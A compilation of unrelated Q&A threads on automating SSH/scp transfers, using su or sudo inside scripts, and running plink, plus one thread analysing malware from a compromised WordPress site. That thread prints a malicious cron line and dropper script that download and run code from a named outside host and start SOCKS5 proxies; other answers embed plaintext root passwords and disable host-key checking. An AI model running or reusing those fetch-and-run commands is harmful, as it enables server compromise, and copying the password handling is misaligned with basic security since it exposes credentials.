When I need to copy a file from local server (server A) to remote server(server B) via SSH, using a user with enough privileges, I do this successfuly like below
localpath='/this/is/local/path/file1.txt'
remotepath='/this/is/remote/path/'
mypass='MyPassword123'
sshpass -p $mypass scp username#hostname:$localpath $remotepath
Now, I have to transfer a file from server A to server C with a user that doesn't have enough privileges to copy. Then once
I connected to Server C, I need to send su in order to be able to send commands like cd, ls, etc.
Manually, I access the server C via SSH like this:
[root#ServerA ~]# ssh username#hostname
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
Last login: Sat Jun 13 10:17:40 2020 from XXX.XXX.XXX.XXX
ServerC ~ $
ServerC ~ $ su
Password:
ServerC /home/myuser #
ServerC /home/myuser # cd /documents/backups/
ServerC /documents/backups #
At this moment myuser has superuser privileges and I can send commands.
Then, how can I automate the task to copy files from server A to server C with the need to send su once I'm connected to Server C?
I've tried so far doing like this:
sshpass -p $mypass ssh -t username#hostname "su -c \"cd /documents/backups/ && ls\""
it requests password for su and I'm able to send cd and ls but with this command, I'm not copying files from Server A to Server C, only semi-automating the access to Server C and sending the su in Server C.
Thanks in advance for any help.
UPDATE
# $TAR | ssh $username#$hostname "$COMMAND"
+ tar -cv -C /this/is/local/path/file1.txt .
+ ssh username#X.X.X.X 'set -x; rm -f /tmp/copy && mknod /tmp/copy p; su - <<< "su_password
set -x; tar -xv -C /this/is/remote/path/ . < /tmp/copy" & cat > /tmp/copy'
tar: /this/is/local/path/file1.txt: Cannot chdir: Not a directory
tar: Error is not recoverable: exiting now
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
+ rm -f /tmp/copy
+ mknod /tmp/copy p
+ su -
+ cat
Password:
Editorial note: the previous version of this answer used sudo, the current version uses su as requested in the question.
You could use tar and pipes, like so:
TAR="tar -cv -C $localpath ."
UNTAR="tar -xv -C $remotepath ."
PREPARE_PIPE="rm -f /tmp/copy && mknod /tmp/copy p"
NEWLINE=$'\n' # that's the easiest way to get a literal newline
ROOT_PASSWORD=rootpasswordverydangerous
COMMAND="set -x; $PREPARE_PIPE; su - <<< \"${ROOT_PASSWORD}${NEWLINE} set -x; $UNTAR < /tmp/copy\" & cat > /tmp/copy"
$TAR | ssh username#hostname "$COMMAND"
Explanation:
tar -c . archives the current directory into a single file. We aren't passing -f to tar, so that single file is standard output.
tar -x . extracts the content of a single tar archive file to the current directory. We aren't passing -f to tar, so that single file is standard input.
-C <path> tells tar to cd into <path> so that it will be the current directory in which files are copied from/to.
-v just tells tar to list the files tar archives/extracts, for debugging purposes.
Likewise, set -x is just to have bash to emit trace information, for debugging purposes.
So we're archiving $localpath into stdout, and piping it to ssh, which will pipe it to $COMMAND.
If there was a way to give su the password in the command line, we would have used something like:
$TAR | ssh ... su --password ${ROOT_PASSWORD} -c "$UNTAR"
and things would have been simple.
But su doesn't have that. su runs like a shell, reading from stdin. So it will first read the password, and once the password is read and su has established a root session, it reads commands from stdin. That's why we have su - <<< \"${ROOT_PASSWORD}${NEWLINE}${UNTAR}.
But now stdin is used by the password and command, so we can't use it as the archive. We could use another file descriptor, but I prefer not to, because then the solution can be more easily ported to work with sudo instead of su. sudo closes all file descriptors, and sudo -C 200 (only close file descriptors above 200) may not work (didn't work on my test machine).
if we went that direction, we would have used something like
$TAR | ssh ... 'exec 9<&2 && sudo -S <<< $mypass bash -c "$UNTAR <&9"'
Our next option is to do something like cat > /tmp/archive.tar in order to write the entire archive into a file, and then have something like $UNTAR < /tmp/archive.tar. But the archive may be huge and we may run out of disk space.
So the idea is to create a dedicated pipe - that's PREPARE_PIPE. Pipes don't save anything to disk, and don't store the entire stream in memory, so the reader and the writer have to work concurrently (you know, like with a real pipe).
So having redirected su's stdin from $ROOT_PASSWORD, we pull ssh's stdin into our pipe with cat > /tmp/copy, and in parallel (&) having $UNTAR read from the pipe (< /tmp/copy).
Notes:
You could also pass -z to both tar commands to pass it compressed, if your network is too slow.
tar will preserve the source's metadata, e.g. timestamps and ownership.
Passing $ROOT_PASSWORD to commands is not good practice, anyone who runs ps -ef can see the password. There are ways to pass the password to server C in a more secure way, I didn't include it in order to not further complicate this answer.
I would suggest asking the server's owner to install sudo, so that if the password is compromised via ps -ef, at least it's not the root password.
Related
I have n number of servers like c0001.test.cloud.com, c0002.test.cloud.com, c0003.test.cloud.com and I want to do the ssh between these servers like:
from Server: c0001 do the ssh to c0002 and then exit the server.
Come back to c0001 do the ssh to c0003 and then exit the server.
So in this way it will execute the script without entering any input during runtime and we can have n number of servers.
I have written one script :
str1=c0001.test.cloud.com,c0002.test.cloud.com,c0003.test.cloud.com
string="$( cut -d ',' -f 2- <<< "$str1" )"
echo "$string"
for j in $(echo $string | sed "s/,/ /g")
do
ssh appAccount#j
done
But this script is not running fine. I have also checked it by passing parameters
like: -o StrictHostKeyChecking=no and <<'ENDSSH' but it is not working.
Assuming the number of commands you want to run are small, you could:
Create a script of commands that will run from c0001.test.cloud.com to each of the servers. For example, create a file on your local machine called commands.sh with:
hosts="c0002.test.cloud.com c0003.test.cloud.com"
for host in $hosts do
ssh -o StrictHostKeyChecking=no -q appAccount#$host <command 1> && <command 2>
done
On your local machine, ssh to c0001.test.cloud.com and execute the commands in commands.sh:
ssh -o StrictHostKeyChecking=no -q appAccount#c0001.test.cloud.com 'bash -s' < commands.sh
However, if your requirements become more complex, a more robust solution might be to use a cluster administration tool such as ClusterShell
Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.
Hi everyone I'm not to ksh. What i'm trying to do is I'm writing a script to scp a(or many) zip file from a local directory to a remote host. Then get the script to ssh into the remote host to gunzip the files I just scp over. Is there any simple way to do this. I keep trying but once I ssh over to the remote host the rest of my commands no longer run like the cd /file/directory and then gzip -d /files etc.....
NB: don't confuse "zip" and "gzip", two different animals
This should work:
cd <local_directory>
# collect files names as $1 $2 ... $N
set -- *.gz # or use your own filter like "dumps*.gz"
# put source file a tar archive and send it as input to ssh
# then, on the other side, untar the file then decompress
tar cf - $* | ssh <user>#<remote_host> "cd <remote dir> && tar xf - && gunzip $*
Note: using "&&" instead of ";" to prevent "tar" command to be executed if "cd" fails for any reason
I want to write a shell script to automate a series of commands. The problem is some commands MUST be run as superuser and some commands MUST NOT be run as superuser. What I have done so far is something like this:
#!/bin/bash
command1
sudo command2
command3
sudo command4
The problem is, this means somebody has to wait until command1 finishes before they are prompted for a password, then, if command3 takes long enough, they will then have to wait for command3 to finish. It would be nice if the person could get up and walk away, then come back an hour later and be done. For example, the following script has this problem:
#!/bin/bash
sleep 310
sudo echo "Hi, I'm root"
sleep 310
sudo echo "I'm still root?"
How can I make it so that the user can just enter their password once, at the very start, and then walk away?
Update:
Thanks for the responses. I'm running on Mac OS X Lion and ran Stephen P's script and got different results: (I also added $HOME)
pair#abbey scratch$ ./test2.sh
uid is 501
user is pair
username is
home directory is /Users/pair
pair#abbey scratch$ sudo ./test2.sh
Password:
uid is 0
user is root
username is root
home directory is /Users/pair
File sutest
#!/bin/bash
echo "uid is ${UID}"
echo "user is ${USER}"
echo "username is ${USERNAME}"
run it: `./sutest' gives me
uid is 500
user is stephenp
username is stephenp
but using sudo: sudo ./sutest gives
uid is 0
user is root
username is stephenp
So you retain the original user name in $USERNAME when running as sudo. This leads to a solution similar to what others posted:
#!/bin/bash
sudo -u ${USERNAME} normal_command_1
root_command_1
root_command_2
sudo -u ${USERNAME} normal_command_2
# etc.
Just sudo to invoke your script in the first place, it will prompt for the password once.
I originally wrote this answer on Linux, which does have some differences with OS X
OS X (I'm testing this on Mountain Lion 10.8.3) has an environment variable SUDO_USER when you're running sudo, which can be used in place of USERNAME above, or to be more cross-platform the script could check to see if SUDO_USER is set and use it if so, or use USERNAME if that's set.
Changing the original script for OS X, it becomes...
#!/bin/bash
sudo -u ${SUDO_USER} normal_command_1
root_command_1
root_command_2
sudo -u ${SUDO_USER} normal_command_2
# etc.
A first stab at making it cross-platform could be...
#!/bin/bash
#
# set "THE_USER" to SUDO_USER if that's set,
# else set it to USERNAME if THAT is set,
# else set it to the string "unknown"
# should probably then test to see if it's "unknown"
#
THE_USER=${SUDO_USER:-${USERNAME:-unknown}}
sudo -u ${THE_USER} normal_command_1
root_command_1
root_command_2
sudo -u ${THE_USER} normal_command_2
# etc.
You should run your entire script as superuser. If you want to run some command as non-superuser, use "-u" option of sudo:
#!/bin/bash
sudo -u username command1
command2
sudo -u username command3
command4
When running as root, sudo doesn't ask for a password.
If you use this, check man sudo too:
#!/bin/bash
sudo echo "Hi, I'm root"
sudo -u nobody echo "I'm nobody"
sudo -u 1000 touch /test_user
Well, you have some options.
You could configure sudo to not prompt for a password. This is not recommended, due to the security risks.
You could write an expect script to read the password and supply it to sudo when required, but that's clunky and fragile.
I would recommend designing the script to run as root and drop its privileges whenever they're not needed. Simply have it sudo -u someotheruser command for the commands that don't require root.
(If they have to run specifically as the user invoking the script, then you could have the script save the uid and invoke a second script via sudo with the id as an argument, so it knows who to su to..)
I'm using plink to run a command on a Unix remote machine.
The command is:
ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';
The way I'm sending this command is by using a file with a set of commands like:
plink.exe -ssh -t -l user -pw pwd tst.url.pt -m commands.out
When I run the command this way the plink does not receive any input. It seems that is waiting for input.
But if I run:
plink.exe -ssh -t -l user -pw pwd tst.url.pt "ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';"
I get the expected result.
I'm not using the plink with a file with the command because I choose so. I'm using a test automation software that allows me to run tests on remote hosts and this is the way the tool works.
Any thoughts on what is going wrong?
I tested the command you provided and it worked without problems.
Maybe the problem is related to:
The server's host key is not cached in the registry.
The path to the file is not correct.
The file is empty.
include server hostkey
most importantly, you need to include the unix profile using the -m paramater
You can include all your commands in the same file where the profile is kept also.
$Output = ((plink.exe -hostkey hostkey -l UNAME -i SSHKEY -P 22 -ssh server -batch -m PROFILE) | ? {$_ -ne ""})